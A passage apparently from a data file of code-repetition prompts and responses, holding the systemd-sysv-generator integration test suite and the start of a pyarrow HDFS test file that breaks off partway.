self.assertEqual(os.readlink(os.path.join(self.out_dir, 'bar.service')),\n 'foo.service')\n\n def test_hidden_files(self):\n '''init.d script with hidden file suffix'''\n\n script = self.add_sysv('foo', {}, enable=True)\n # backup files (not enabled in rcN.d/)\n shutil.copy(script, script + '.dpkg-new')\n shutil.copy(script, script + '.dpkg-dist')\n shutil.copy(script, script + '.swp')\n shutil.copy(script, script + '.rpmsave')\n\n err, results = self.run_generator()\n self.assertEqual(list(results), ['foo.service'])\n\n self.assert_enabled('foo.service', [2, 3, 4, 5])\n\n def test_backup_file(self):\n '''init.d script with backup file'''\n\n script = self.add_sysv('foo', {}, enable=True)\n # backup files (not enabled in rcN.d/)\n shutil.copy(script, script + '.bak')\n shutil.copy(script, script + '.old')\n\n err, results = self.run_generator()\n print(err)\n self.assertEqual(sorted(results),\n ['foo.bak.service', 'foo.old.service', 'foo.service'])\n\n # ensure we don't try to create a symlink to itself\n self.assertNotIn('itself', err)\n\n self.assert_enabled('foo.service', [2, 3, 4, 5])\n self.assert_enabled('foo.bak.service', [])\n self.assert_enabled('foo.old.service', [])\n\n def test_existing_native_unit(self):\n '''existing native unit'''\n\n with open(os.path.join(self.unit_dir, 'foo.service'), 'w') as f:\n f.write('[Unit]\\n')\n\n self.add_sysv('foo.sh', {'Provides': 'foo bar'}, enable=True)\n err, results = self.run_generator()\n self.assertEqual(list(results), [])\n # no enablement or alias links, as native unit is disabled\n self.assertEqual(os.listdir(self.out_dir), [])\n\n\nif __name__ == '__main__':\n unittest.main(testRunner=unittest.TextTestRunner(stream=sys.stdout, verbosity=2))\n```",
"role": "user"
}
] |
[
{
"content": "Repeat the following code:\n<|memory_start|>```python\n# systemd-sysv-generator integration test\n#\n# (C) 2015 Canonical Ltd.\n# Author: Martin Pitt <[email protected]>\n#\n# systemd is free software; you can redistribute it and/or modify it\n# under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation; either version 2.1 of the License, or\n# (at your option) any later version.\n\n# systemd is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with systemd; If not, see <http://www.gnu.org/licenses/>.\n\nimport unittest\nimport sys\nimport os\nimport subprocess\nimport tempfile\nimport shutil\nfrom glob import glob\n\ntry:\n from configparser import RawConfigParser\nexcept ImportError:\n # python 2\n from ConfigParser import RawConfigParser\n\nsysv_generator = os.path.join(os.environ.get('builddir', '.'), 'systemd-sysv-generator')\n\n\nclass SysvGeneratorTest(unittest.TestCase):\n def setUp(self):\n self.workdir = tempfile.mkdtemp(prefix='sysv-gen-test.')\n self.init_d_dir = os.path.join(self.workdir, 'init.d')\n os.mkdir(self.init_d_dir)\n self.rcnd_dir = self.workdir\n self.unit_dir = os.path.join(self.workdir, 'systemd')\n os.mkdir(self.unit_dir)\n self.out_dir = os.path.join(self.workdir, 'output')\n os.mkdir(self.out_dir)\n\n def tearDown(self):\n shutil.rmtree(self.workdir)\n\n #\n # Helper methods\n #\n\n def run_generator(self, expect_error=False):\n '''Run sysv-generator.\n\n Fail if stderr contains any \"Fail\", unless expect_error is True.\n Return (stderr, filename -> ConfigParser) pair with ouput to stderr and\n parsed generated units.\n '''\n env = os.environ.copy()\n env['SYSTEMD_LOG_LEVEL'] = 'debug'\n env['SYSTEMD_SYSVINIT_PATH'] = self.init_d_dir\n env['SYSTEMD_SYSVRCND_PATH'] = self.rcnd_dir\n env['SYSTEMD_UNIT_PATH'] = self.unit_dir\n gen = subprocess.Popen(\n [sysv_generator, 'ignored', 'ignored', self.out_dir],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n universal_newlines=True, env=env)\n (out, err) = gen.communicate()\n if not expect_error:\n self.assertFalse('Fail' in err, err)\n self.assertEqual(gen.returncode, 0, err)\n\n results = {}\n for service in glob(self.out_dir + '/*.service'):\n if os.path.islink(service):\n continue\n cp = RawConfigParser()\n cp.optionxform = lambda o: o # don't lower-case option names\n with open(service) as f:\n cp.readfp(f)\n results[os.path.basename(service)] = cp\n\n return (err, results)\n\n def add_sysv(self, fname, keys, enable=False, prio=1):\n '''Create a SysV init script with the given keys in the LSB header\n\n There are sensible default values for all fields.\n If enable is True, links will be created in the rcN.d dirs. In that\n case, the priority can be given with \"prio\" (default to 1).\n\n Return path of generated script.\n '''\n name_without_sh = fname.endswith('.sh') and fname[:-3] or fname\n keys.setdefault('Provides', name_without_sh)\n keys.setdefault('Required-Start', '$local_fs')\n keys.setdefault('Required-Stop', keys['Required-Start'])\n keys.setdefault('Default-Start', '2 3 4 5')\n keys.setdefault('Default-Stop', '0 1 6')\n keys.setdefault('Short-Description', 'test %s service' %\n name_without_sh)\n keys.setdefault('Description', 'long description for test %s service' %\n name_without_sh)\n script = os.path.join(self.init_d_dir, fname)\n with open(script, 'w') as f:\n f.write('#!/bin/init-d-interpreter\\n### BEGIN INIT INFO\\n')\n for k, v in keys.items():\n if v is not None:\n f.write('#%20s %s\\n' % (k + ':', v))\n f.write('### END INIT INFO\\ncode --goes here\\n')\n os.chmod(script, 0o755)\n\n if enable:\n def make_link(prefix, runlevel):\n d = os.path.join(self.rcnd_dir, 'rc%s.d' % runlevel)\n if not os.path.isdir(d):\n os.mkdir(d)\n os.symlink('../init.d/' + fname, os.path.join(d, prefix + fname))\n\n for rl in keys['Default-Start'].split():\n make_link('S%02i' % prio, rl)\n for rl in keys['Default-Stop'].split():\n make_link('K%02i' % (99 - prio), rl)\n\n return script\n\n def assert_enabled(self, unit, runlevels):\n '''assert that a unit is enabled in precisely the given runlevels'''\n\n all_runlevels = [2, 3, 4, 5]\n\n # should be enabled\n for runlevel in all_runlevels:\n link = os.path.join(self.out_dir, 'runlevel%i.target.wants' % runlevel, unit)\n if runlevel in runlevels:\n target = os.readlink(link)\n self.assertTrue(os.path.exists(target))\n self.assertEqual(os.path.basename(target), unit)\n else:\n self.assertFalse(os.path.exists(link),\n '%s unexpectedly exists' % link)\n\n #\n # test cases\n #\n\n def test_nothing(self):\n '''no input files'''\n\n results = self.run_generator()[1]\n self.assertEqual(results, {})\n self.assertEqual(os.listdir(self.out_dir), [])\n\n def test_simple_disabled(self):\n '''simple service without dependencies, disabled'''\n\n self.add_sysv('foo', {}, enable=False)\n err, results = self.run_generator()\n self.assertEqual(len(results), 1)\n\n # no enablement links or other stuff\n self.assertEqual(os.listdir(self.out_dir), ['foo.service'])\n\n s = results['foo.service']\n self.assertEqual(s.sections(), ['Unit', 'Service'])\n self.assertEqual(s.get('Unit', 'Description'), 'LSB: test foo service')\n # $local_fs does not need translation, don't expect any dependency\n # fields here\n self.assertEqual(set(s.options('Unit')),\n set(['Documentation', 'SourcePath', 'Description']))\n\n self.assertEqual(s.get('Service', 'Type'), 'forking')\n init_script = os.path.join(self.init_d_dir, 'foo')\n self.assertEqual(s.get('Service', 'ExecStart'),\n '%s start' % init_script)\n self.assertEqual(s.get('Service', 'ExecStop'),\n '%s stop' % init_script)\n\n self.assertNotIn('Overwriting', err)\n\n def test_simple_enabled_all(self):\n '''simple service without dependencies, enabled in all runlevels'''\n\n self.add_sysv('foo', {}, enable=True)\n err, results = self.run_generator()\n self.assertEqual(list(results), ['foo.service'])\n self.assert_enabled('foo.service', [2, 3, 4, 5])\n self.assertNotIn('Overwriting', err)\n\n def test_simple_enabled_some(self):\n '''simple service without dependencies, enabled in some runlevels'''\n\n self.add_sysv('foo', {'Default-Start': '2 4'}, enable=True)\n err, results = self.run_generator()\n self.assertEqual(list(results), ['foo.service'])\n self.assert_enabled('foo.service', [2, 4])\n\n def test_lsb_macro_dep_single(self):\n '''single LSB macro dependency: $network'''\n\n self.add_sysv('foo', {'Required-Start': '$network'})\n s = self.run_generator()[1]['foo.service']\n self.assertEqual(set(s.options('Unit')),\n set(['Documentation', 'SourcePath', 'Description', 'After', 'Wants']))\n self.assertEqual(s.get('Unit', 'After'), 'network-online.target')\n self.assertEqual(s.get('Unit', 'Wants'), 'network-online.target')\n\n def test_lsb_macro_dep_multi(self):\n '''multiple LSB macro dependencies'''\n\n self.add_sysv('foo', {'Required-Start': '$named $portmap'})\n s = self.run_generator()[1]['foo.service']\n self.assertEqual(set(s.options('Unit')),\n set(['Documentation', 'SourcePath', 'Description', 'After']))\n self.assertEqual(s.get('Unit', 'After'), 'nss-lookup.target rpcbind.target')\n\n def test_lsb_deps(self):\n '''LSB header dependencies to other services'''\n\n # also give symlink priorities here; they should be ignored\n self.add_sysv('foo', {'Required-Start': 'must1 must2',\n 'Should-Start': 'may1 ne_may2'},\n enable=True, prio=40)\n self.add_sysv('must1', {}, enable=True, prio=10)\n self.add_sysv('must2', {}, enable=True, prio=15)\n self.add_sysv('may1', {}, enable=True, prio=20)\n # do not create ne_may2\n err, results = self.run_generator()\n self.assertEqual(sorted(results),\n ['foo.service', 'may1.service', 'must1.service', 'must2.service'])\n\n # foo should depend on all of them\n self.assertEqual(sorted(results['foo.service'].get('Unit', 'After').split()),\n ['may1.service', 'must1.service', 'must2.service', 'ne_may2.service'])\n\n # other services should not depend on each other\n self.assertFalse(results['must1.service'].has_option('Unit', 'After'))\n self.assertFalse(results['must2.service'].has_option('Unit', 'After'))\n self.assertFalse(results['may1.service'].has_option('Unit', 'After'))\n\n def test_symlink_prio_deps(self):\n '''script without LSB headers use rcN.d priority'''\n\n # create two init.d scripts without LSB header and enable them with\n # startup priorities\n for prio, name in [(10, 'provider'), (15, 'consumer')]:\n with open(os.path.join(self.init_d_dir, name), 'w') as f:\n f.write('#!/bin/init-d-interpreter\\ncode --goes here\\n')\n os.fchmod(f.fileno(), 0o755)\n\n d = os.path.join(self.rcnd_dir, 'rc2.d')\n if not os.path.isdir(d):\n os.mkdir(d)\n os.symlink('../init.d/' + name, os.path.join(d, 'S%02i%s' % (prio, name)))\n\n err, results = self.run_generator()\n self.assertEqual(sorted(results), ['consumer.service', 'provider.service'])\n self.assertFalse(results['provider.service'].has_option('Unit', 'After'))\n self.assertEqual(results['consumer.service'].get('Unit', 'After'),\n 'provider.service')\n\n def test_multiple_provides(self):\n '''multiple Provides: names'''\n\n self.add_sysv('foo', {'Provides': 'foo bar baz'})\n err, results = self.run_generator()\n self.assertEqual(list(results), ['foo.service'])\n self.assertEqual(set(results['foo.service'].options('Unit')),\n set(['Documentation', 'SourcePath', 'Description']))\n # should create symlinks for the alternative names\n for f in ['bar.service', 'baz.service']:\n self.assertEqual(os.readlink(os.path.join(self.out_dir, f)),\n 'foo.service')\n self.assertNotIn('Overwriting', err)\n\n def test_same_provides_in_multiple_scripts(self):\n '''multiple init.d scripts provide the same name'''\n\n self.add_sysv('foo', {'Provides': 'foo common'}, enable=True, prio=1)\n self.add_sysv('bar', {'Provides': 'bar common'}, enable=True, prio=2)\n err, results = self.run_generator()\n self.assertEqual(sorted(results), ['bar.service', 'foo.service'])\n # should create symlink for the alternative name for either unit\n self.assertIn(os.readlink(os.path.join(self.out_dir, 'common.service')),\n ['foo.service', 'bar.service'])\n\n def test_provide_other_script(self):\n '''init.d scripts provides the name of another init.d script'''\n\n self.add_sysv('foo', {'Provides': 'foo bar'}, enable=True)\n self.add_sysv('bar', {'Provides': 'bar'}, enable=True)\n err, results = self.run_generator()\n self.assertEqual(sorted(results), ['bar.service', 'foo.service'])\n # we do expect an overwrite here, bar.service should overwrite the\n # alias link from foo.service\n self.assertIn('Overwriting', err)\n\n def test_nonexecutable_script(self):\n '''ignores non-executable init.d script'''\n\n os.chmod(self.add_sysv('foo', {}), 0o644)\n err, results = self.run_generator()\n self.assertEqual(results, {})\n\n def test_sh_suffix(self):\n '''init.d script with .sh suffix'''\n\n self.add_sysv('foo.sh', {}, enable=True)\n err, results = self.run_generator()\n s = results['foo.service']\n\n self.assertEqual(s.sections(), ['Unit', 'Service'])\n # should not have a .sh\n self.assertEqual(s.get('Unit', 'Description'), 'LSB: test foo service')\n\n # calls correct script with .sh\n init_script = os.path.join(self.init_d_dir, 'foo.sh')\n self.assertEqual(s.get('Service', 'ExecStart'),\n '%s start' % init_script)\n self.assertEqual(s.get('Service', 'ExecStop'),\n '%s stop' % init_script)\n\n self.assert_enabled('foo.service', [2, 3, 4, 5])\n\n def test_sh_suffix_with_provides(self):\n '''init.d script with .sh suffix and Provides:'''\n\n self.add_sysv('foo.sh', {'Provides': 'foo bar'})\n err, results = self.run_generator()\n # ensure we don't try to create a symlink to itself\n self.assertNotIn('itself', err)\n self.assertEqual(list(results), ['foo.service'])\n self.assertEqual(results['foo.service'].get('Unit', 'Description'),\n 'LSB: test foo service')\n\n # should create symlink for the alternative name\n self.assertEqual(os.readlink(os.path.join(self.out_dir, 'bar.service')),\n 'foo.service')\n\n def test_hidden_files(self):\n '''init.d script with hidden file suffix'''\n\n script = self.add_sysv('foo', {}, enable=True)\n # backup files (not enabled in rcN.d/)\n shutil.copy(script, script + '.dpkg-new')\n shutil.copy(script, script + '.dpkg-dist')\n shutil.copy(script, script + '.swp')\n shutil.copy(script, script + '.rpmsave')\n\n err, results = self.run_generator()\n self.assertEqual(list(results), ['foo.service'])\n\n self.assert_enabled('foo.service', [2, 3, 4, 5])\n\n def test_backup_file(self):\n '''init.d script with backup file'''\n\n script = self.add_sysv('foo', {}, enable=True)\n # backup files (not enabled in rcN.d/)\n shutil.copy(script, script + '.bak')\n shutil.copy(script, script + '.old')\n\n err, results = self.run_generator()\n print(err)\n self.assertEqual(sorted(results),\n ['foo.bak.service', 'foo.old.service', 'foo.service'])\n\n # ensure we don't try to create a symlink to itself\n self.assertNotIn('itself', err)\n\n self.assert_enabled('foo.service', [2, 3, 4, 5])\n self.assert_enabled('foo.bak.service', [])\n self.assert_enabled('foo.old.service', [])\n\n def test_existing_native_unit(self):\n '''existing native unit'''\n\n with open(os.path.join(self.unit_dir, 'foo.service'), 'w') as f:\n f.write('[Unit]\\n')\n\n self.add_sysv('foo.sh', {'Provides': 'foo bar'}, enable=True)\n err, results = self.run_generator()\n self.assertEqual(list(results), [])\n # no enablement or alias links, as native unit is disabled\n self.assertEqual(os.listdir(self.out_dir), [])\n\n\nif __name__ == '__main__':\n unittest.main(testRunner=unittest.TextTestRunner(stream=sys.stdout, verbosity=2))\n```<|memory_end|>",
"role": "user"
}
] |
```python
# systemd-sysv-generator integration test
#
# (C) 2015 Canonical Ltd.
# Author: Martin Pitt <[email protected]>
#
# systemd is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.
# systemd is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with systemd; If not, see <http://www.gnu.org/licenses/>.
import unittest
import sys
import os
import subprocess
import tempfile
import shutil
from glob import glob
try:
from configparser import RawConfigParser
except ImportError:
# python 2
from ConfigParser import RawConfigParser
sysv_generator = os.path.join(os.environ.get('builddir', '.'), 'systemd-sysv-generator')
class SysvGeneratorTest(unittest.TestCase):
def setUp(self):
self.workdir = tempfile.mkdtemp(prefix='sysv-gen-test.')
self.init_d_dir = os.path.join(self.workdir, 'init.d')
os.mkdir(self.init_d_dir)
self.rcnd_dir = self.workdir
self.unit_dir = os.path.join(self.workdir, 'systemd')
os.mkdir(self.unit_dir)
self.out_dir = os.path.join(self.workdir, 'output')
os.mkdir(self.out_dir)
def tearDown(self):
shutil.rmtree(self.workdir)
#
# Helper methods
#
def run_generator(self, expect_error=False):
'''Run sysv-generator.
Fail if stderr contains any "Fail", unless expect_error is True.
Return (stderr, filename -> ConfigParser) pair with ouput to stderr and
parsed generated units.
'''
env = os.environ.copy()
env['SYSTEMD_LOG_LEVEL'] = 'debug'
env['SYSTEMD_SYSVINIT_PATH'] = self.init_d_dir
env['SYSTEMD_SYSVRCND_PATH'] = self.rcnd_dir
env['SYSTEMD_UNIT_PATH'] = self.unit_dir
gen = subprocess.Popen(
[sysv_generator, 'ignored', 'ignored', self.out_dir],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, env=env)
(out, err) = gen.communicate()
if not expect_error:
self.assertFalse('Fail' in err, err)
self.assertEqual(gen.returncode, 0, err)
results = {}
for service in glob(self.out_dir + '/*.service'):
if os.path.islink(service):
continue
cp = RawConfigParser()
cp.optionxform = lambda o: o # don't lower-case option names
with open(service) as f:
cp.readfp(f)
results[os.path.basename(service)] = cp
return (err, results)
def add_sysv(self, fname, keys, enable=False, prio=1):
'''Create a SysV init script with the given keys in the LSB header
There are sensible default values for all fields.
If enable is True, links will be created in the rcN.d dirs. In that
case, the priority can be given with "prio" (default to 1).
Return path of generated script.
'''
name_without_sh = fname.endswith('.sh') and fname[:-3] or fname
keys.setdefault('Provides', name_without_sh)
keys.setdefault('Required-Start', '$local_fs')
keys.setdefault('Required-Stop', keys['Required-Start'])
keys.setdefault('Default-Start', '2 3 4 5')
keys.setdefault('Default-Stop', '0 1 6')
keys.setdefault('Short-Description', 'test %s service' %
name_without_sh)
keys.setdefault('Description', 'long description for test %s service' %
name_without_sh)
script = os.path.join(self.init_d_dir, fname)
with open(script, 'w') as f:
f.write('#!/bin/init-d-interpreter\n### BEGIN INIT INFO\n')
for k, v in keys.items():
if v is not None:
f.write('#%20s %s\n' % (k + ':', v))
f.write('### END INIT INFO\ncode --goes here\n')
os.chmod(script, 0o755)
if enable:
def make_link(prefix, runlevel):
d = os.path.join(self.rcnd_dir, 'rc%s.d' % runlevel)
if not os.path.isdir(d):
os.mkdir(d)
os.symlink('../init.d/' + fname, os.path.join(d, prefix + fname))
for rl in keys['Default-Start'].split():
make_link('S%02i' % prio, rl)
for rl in keys['Default-Stop'].split():
make_link('K%02i' % (99 - prio), rl)
return script
def assert_enabled(self, unit, runlevels):
'''assert that a unit is enabled in precisely the given runlevels'''
all_runlevels = [2, 3, 4, 5]
# should be enabled
for runlevel in all_runlevels:
link = os.path.join(self.out_dir, 'runlevel%i.target.wants' % runlevel, unit)
if runlevel in runlevels:
target = os.readlink(link)
self.assertTrue(os.path.exists(target))
self.assertEqual(os.path.basename(target), unit)
else:
self.assertFalse(os.path.exists(link),
'%s unexpectedly exists' % link)
#
# test cases
#
def test_nothing(self):
'''no input files'''
results = self.run_generator()[1]
self.assertEqual(results, {})
self.assertEqual(os.listdir(self.out_dir), [])
def test_simple_disabled(self):
'''simple service without dependencies, disabled'''
self.add_sysv('foo', {}, enable=False)
err, results = self.run_generator()
self.assertEqual(len(results), 1)
# no enablement links or other stuff
self.assertEqual(os.listdir(self.out_dir), ['foo.service'])
s = results['foo.service']
self.assertEqual(s.sections(), ['Unit', 'Service'])
self.assertEqual(s.get('Unit', 'Description'), 'LSB: test foo service')
# $local_fs does not need translation, don't expect any dependency
# fields here
self.assertEqual(set(s.options('Unit')),
set(['Documentation', 'SourcePath', 'Description']))
self.assertEqual(s.get('Service', 'Type'), 'forking')
init_script = os.path.join(self.init_d_dir, 'foo')
self.assertEqual(s.get('Service', 'ExecStart'),
'%s start' % init_script)
self.assertEqual(s.get('Service', 'ExecStop'),
'%s stop' % init_script)
self.assertNotIn('Overwriting', err)
def test_simple_enabled_all(self):
'''simple service without dependencies, enabled in all runlevels'''
self.add_sysv('foo', {}, enable=True)
err, results = self.run_generator()
self.assertEqual(list(results), ['foo.service'])
self.assert_enabled('foo.service', [2, 3, 4, 5])
self.assertNotIn('Overwriting', err)
def test_simple_enabled_some(self):
'''simple service without dependencies, enabled in some runlevels'''
self.add_sysv('foo', {'Default-Start': '2 4'}, enable=True)
err, results = self.run_generator()
self.assertEqual(list(results), ['foo.service'])
self.assert_enabled('foo.service', [2, 4])
def test_lsb_macro_dep_single(self):
'''single LSB macro dependency: $network'''
self.add_sysv('foo', {'Required-Start': '$network'})
s = self.run_generator()[1]['foo.service']
self.assertEqual(set(s.options('Unit')),
set(['Documentation', 'SourcePath', 'Description', 'After', 'Wants']))
self.assertEqual(s.get('Unit', 'After'), 'network-online.target')
self.assertEqual(s.get('Unit', 'Wants'), 'network-online.target')
def test_lsb_macro_dep_multi(self):
'''multiple LSB macro dependencies'''
self.add_sysv('foo', {'Required-Start': '$named $portmap'})
s = self.run_generator()[1]['foo.service']
self.assertEqual(set(s.options('Unit')),
set(['Documentation', 'SourcePath', 'Description', 'After']))
self.assertEqual(s.get('Unit', 'After'), 'nss-lookup.target rpcbind.target')
def test_lsb_deps(self):
'''LSB header dependencies to other services'''
# also give symlink priorities here; they should be ignored
self.add_sysv('foo', {'Required-Start': 'must1 must2',
'Should-Start': 'may1 ne_may2'},
enable=True, prio=40)
self.add_sysv('must1', {}, enable=True, prio=10)
self.add_sysv('must2', {}, enable=True, prio=15)
self.add_sysv('may1', {}, enable=True, prio=20)
# do not create ne_may2
err, results = self.run_generator()
self.assertEqual(sorted(results),
['foo.service', 'may1.service', 'must1.service', 'must2.service'])
# foo should depend on all of them
self.assertEqual(sorted(results['foo.service'].get('Unit', 'After').split()),
['may1.service', 'must1.service', 'must2.service', 'ne_may2.service'])
# other services should not depend on each other
self.assertFalse(results['must1.service'].has_option('Unit', 'After'))
self.assertFalse(results['must2.service'].has_option('Unit', 'After'))
self.assertFalse(results['may1.service'].has_option('Unit', 'After'))
def test_symlink_prio_deps(self):
'''script without LSB headers use rcN.d priority'''
# create two init.d scripts without LSB header and enable them with
# startup priorities
for prio, name in [(10, 'provider'), (15, 'consumer')]:
with open(os.path.join(self.init_d_dir, name), 'w') as f:
f.write('#!/bin/init-d-interpreter\ncode --goes here\n')
os.fchmod(f.fileno(), 0o755)
d = os.path.join(self.rcnd_dir, 'rc2.d')
if not os.path.isdir(d):
os.mkdir(d)
os.symlink('../init.d/' + name, os.path.join(d, 'S%02i%s' % (prio, name)))
err, results = self.run_generator()
self.assertEqual(sorted(results), ['consumer.service', 'provider.service'])
self.assertFalse(results['provider.service'].has_option('Unit', 'After'))
self.assertEqual(results['consumer.service'].get('Unit', 'After'),
'provider.service')
def test_multiple_provides(self):
'''multiple Provides: names'''
self.add_sysv('foo', {'Provides': 'foo bar baz'})
err, results = self.run_generator()
self.assertEqual(list(results), ['foo.service'])
self.assertEqual(set(results['foo.service'].options('Unit')),
set(['Documentation', 'SourcePath', 'Description']))
# should create symlinks for the alternative names
for f in ['bar.service', 'baz.service']:
self.assertEqual(os.readlink(os.path.join(self.out_dir, f)),
'foo.service')
self.assertNotIn('Overwriting', err)
def test_same_provides_in_multiple_scripts(self):
'''multiple init.d scripts provide the same name'''
self.add_sysv('foo', {'Provides': 'foo common'}, enable=True, prio=1)
self.add_sysv('bar', {'Provides': 'bar common'}, enable=True, prio=2)
err, results = self.run_generator()
self.assertEqual(sorted(results), ['bar.service', 'foo.service'])
# should create symlink for the alternative name for either unit
self.assertIn(os.readlink(os.path.join(self.out_dir, 'common.service')),
['foo.service', 'bar.service'])
def test_provide_other_script(self):
'''init.d scripts provides the name of another init.d script'''
self.add_sysv('foo', {'Provides': 'foo bar'}, enable=True)
self.add_sysv('bar', {'Provides': 'bar'}, enable=True)
err, results = self.run_generator()
self.assertEqual(sorted(results), ['bar.service', 'foo.service'])
# we do expect an overwrite here, bar.service should overwrite the
# alias link from foo.service
self.assertIn('Overwriting', err)
def test_nonexecutable_script(self):
'''ignores non-executable init.d script'''
os.chmod(self.add_sysv('foo', {}), 0o644)
err, results = self.run_generator()
self.assertEqual(results, {})
def test_sh_suffix(self):
'''init.d script with .sh suffix'''
self.add_sysv('foo.sh', {}, enable=True)
err, results = self.run_generator()
s = results['foo.service']
self.assertEqual(s.sections(), ['Unit', 'Service'])
# should not have a .sh
self.assertEqual(s.get('Unit', 'Description'), 'LSB: test foo service')
# calls correct script with .sh
init_script = os.path.join(self.init_d_dir, 'foo.sh')
self.assertEqual(s.get('Service', 'ExecStart'),
'%s start' % init_script)
self.assertEqual(s.get('Service', 'ExecStop'),
'%s stop' % init_script)
self.assert_enabled('foo.service', [2, 3, 4, 5])
def test_sh_suffix_with_provides(self):
'''init.d script with .sh suffix and Provides:'''
self.add_sysv('foo.sh', {'Provides': 'foo bar'})
err, results = self.run_generator()
# ensure we don't try to create a symlink to itself
self.assertNotIn('itself', err)
self.assertEqual(list(results), ['foo.service'])
self.assertEqual(results['foo.service'].get('Unit', 'Description'),
'LSB: test foo service')
# should create symlink for the alternative name
self.assertEqual(os.readlink(os.path.join(self.out_dir, 'bar.service')),
'foo.service')
def test_hidden_files(self):
'''init.d script with hidden file suffix'''
script = self.add_sysv('foo', {}, enable=True)
# backup files (not enabled in rcN.d/)
shutil.copy(script, script + '.dpkg-new')
shutil.copy(script, script + '.dpkg-dist')
shutil.copy(script, script + '.swp')
shutil.copy(script, script + '.rpmsave')
err, results = self.run_generator()
self.assertEqual(list(results), ['foo.service'])
self.assert_enabled('foo.service', [2, 3, 4, 5])
def test_backup_file(self):
'''init.d script with backup file'''
script = self.add_sysv('foo', {}, enable=True)
# backup files (not enabled in rcN.d/)
shutil.copy(script, script + '.bak')
shutil.copy(script, script + '.old')
err, results = self.run_generator()
print(err)
self.assertEqual(sorted(results),
['foo.bak.service', 'foo.old.service', 'foo.service'])
# ensure we don't try to create a symlink to itself
self.assertNotIn('itself', err)
self.assert_enabled('foo.service', [2, 3, 4, 5])
self.assert_enabled('foo.bak.service', [])
self.assert_enabled('foo.old.service', [])
def test_existing_native_unit(self):
'''existing native unit'''
with open(os.path.join(self.unit_dir, 'foo.service'), 'w') as f:
f.write('[Unit]\n')
self.add_sysv('foo.sh', {'Provides': 'foo bar'}, enable=True)
err, results = self.run_generator()
self.assertEqual(list(results), [])
# no enablement or alias links, as native unit is disabled
self.assertEqual(os.listdir(self.out_dir), [])
if __name__ == '__main__':
unittest.main(testRunner=unittest.TextTestRunner(stream=sys.stdout, verbosity=2))
```
|
[
{
"content": "Reproduce the code exactly as provided (keep formatting):\n```python\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\nimport os\nimport pickle\nimport pytest\nimport random\nimport unittest\n\nfrom io import BytesIO\nfrom os.path import join as pjoin\n\nimport numpy as np\nimport pyarrow as pa\nimport pyarrow.tests.test_parquet as test_parquet\n\nfrom pyarrow.pandas_compat import _pandas_api\nfrom pyarrow.tests import util\nfrom pyarrow.util import guid\n\n\n# ----------------------------------------------------------------------\n# HDFS tests\n\n\ndef hdfs_test_client():\n host = os.environ.get('ARROW_HDFS_TEST_HOST', 'default')\n user = os.environ.get('ARROW_HDFS_TEST_USER', None)\n try:\n port = int(os.environ.get('ARROW_HDFS_TEST_PORT', 0))\n except ValueError:\n raise ValueError('Env variable ARROW_HDFS_TEST_PORT was not '\n 'an integer')\n\n with pytest.warns(DeprecationWarning):\n return pa.hdfs.connect(host, port, user)\n\n\[email protected]\nclass HdfsTestCases:\n\n def _make_test_file(self, hdfs, test_name, test_path, test_data):\n base_path = pjoin(self.tmp_path, test_name)\n hdfs.mkdir(base_path)\n\n full_path = pjoin(base_path, test_path)\n\n with hdfs.open(full_path, 'wb') as f:\n f.write(test_data)\n\n return full_path\n\n @classmethod\n def setUpClass(cls):\n cls.check_driver()\n cls.hdfs = hdfs_test_client()\n cls.tmp_path = '/tmp/pyarrow-test-{}'.format(random.randint(0, 1000))\n cls.hdfs.mkdir(cls.tmp_path)\n\n @classmethod\n def tearDownClass(cls):\n cls.hdfs.delete(cls.tmp_path, recursive=True)\n cls.hdfs.close()\n\n def test_pickle(self):\n s = pickle.dumps(self.hdfs)\n h2 = pickle.loads(s)\n assert h2.is_open\n assert h2.host == self.hdfs.host\n assert h2.port == self.hdfs.port\n assert h2.user == self.hdfs.user\n assert h2.kerb_ticket == self.hdfs.kerb_ticket\n # smoketest unpickled client works\n h2.ls(self.tmp_path)\n\n def test_cat(self):\n path = pjoin(self.tmp_path, 'cat-test')\n\n data = b'foobarbaz'\n with self.hdfs.open(path, 'wb') as f:\n f.write(data)\n\n contents = self.hdfs.cat(path)\n assert contents == data\n\n def test_capacity_space(self):\n capacity = self.hdfs.get_capacity()\n space_used = self.hdfs.get_space_used()\n disk_free = self.hdfs.df()\n\n assert capacity > 0\n assert capacity > space_used\n assert disk_free == (capacity - space_used)\n\n def test_close(self):\n client = hdfs_test_client()\n assert client.is_open\n client.close()\n assert not client.is_open\n\n with pytest.raises(Exception):\n client.ls('/')\n\n def test_mkdir(self):\n path = pjoin(self.tmp_path, 'test-dir/test-dir')\n parent_path = pjoin(self.tmp_path, 'test-dir')\n\n self.hdfs.mkdir(path)\n assert self.hdfs.exists(path)\n\n self.hdfs.delete(parent_path, recursive=True)\n assert not self.hdfs.exists(path)\n\n def test_mv_rename(self):\n path = pjoin(self.tmp_path, 'mv-test')\n new_path = pjoin(self.tmp_path, 'mv-new-test')\n\n data = b'foobarbaz'\n with self.hdfs.open(path, 'wb') as f:\n f.write(data)\n\n assert self.hdfs.exists(path)\n self.hdfs.mv(path, new_path)\n assert not self.hdfs.exists(path)\n assert self.hdfs.exists(new_path)\n\n assert self.hdfs.cat(new_path) == data\n\n self.hdfs.rename(new_path, path)\n assert self.hdfs.cat(path) == data\n\n def test_info(self):\n path = 